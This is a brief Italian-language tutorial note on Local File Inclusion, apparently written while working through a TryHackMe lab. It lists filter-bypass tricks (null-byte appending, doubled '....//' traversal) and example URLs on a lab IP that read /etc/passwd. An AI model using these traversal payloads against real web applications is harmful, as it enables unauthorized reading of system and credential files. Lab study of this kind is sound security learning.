Tutorials
Local File Inclusion
%00 = null byte da includere alla fine per bypassare il controllo se ti accorgi che /../../../.. vengono eliminate, raddoppiale: //....//....//....
#exploitation#web
%00 = null byte da includere alla fine per bypassare il controllo
se ti accorgi che /../../../.. vengono eliminate, raddoppiale: //....//....//....
inizialmente inserire sempre la directory che il sito si aspetta, e poi andare negli altri file:
http://10.10.216.190/lab6.php?file=THM-profile/../../../../etc/passwd SI
http://10.10.216.190/lab6.php?file=/../../../../etc/passwd NO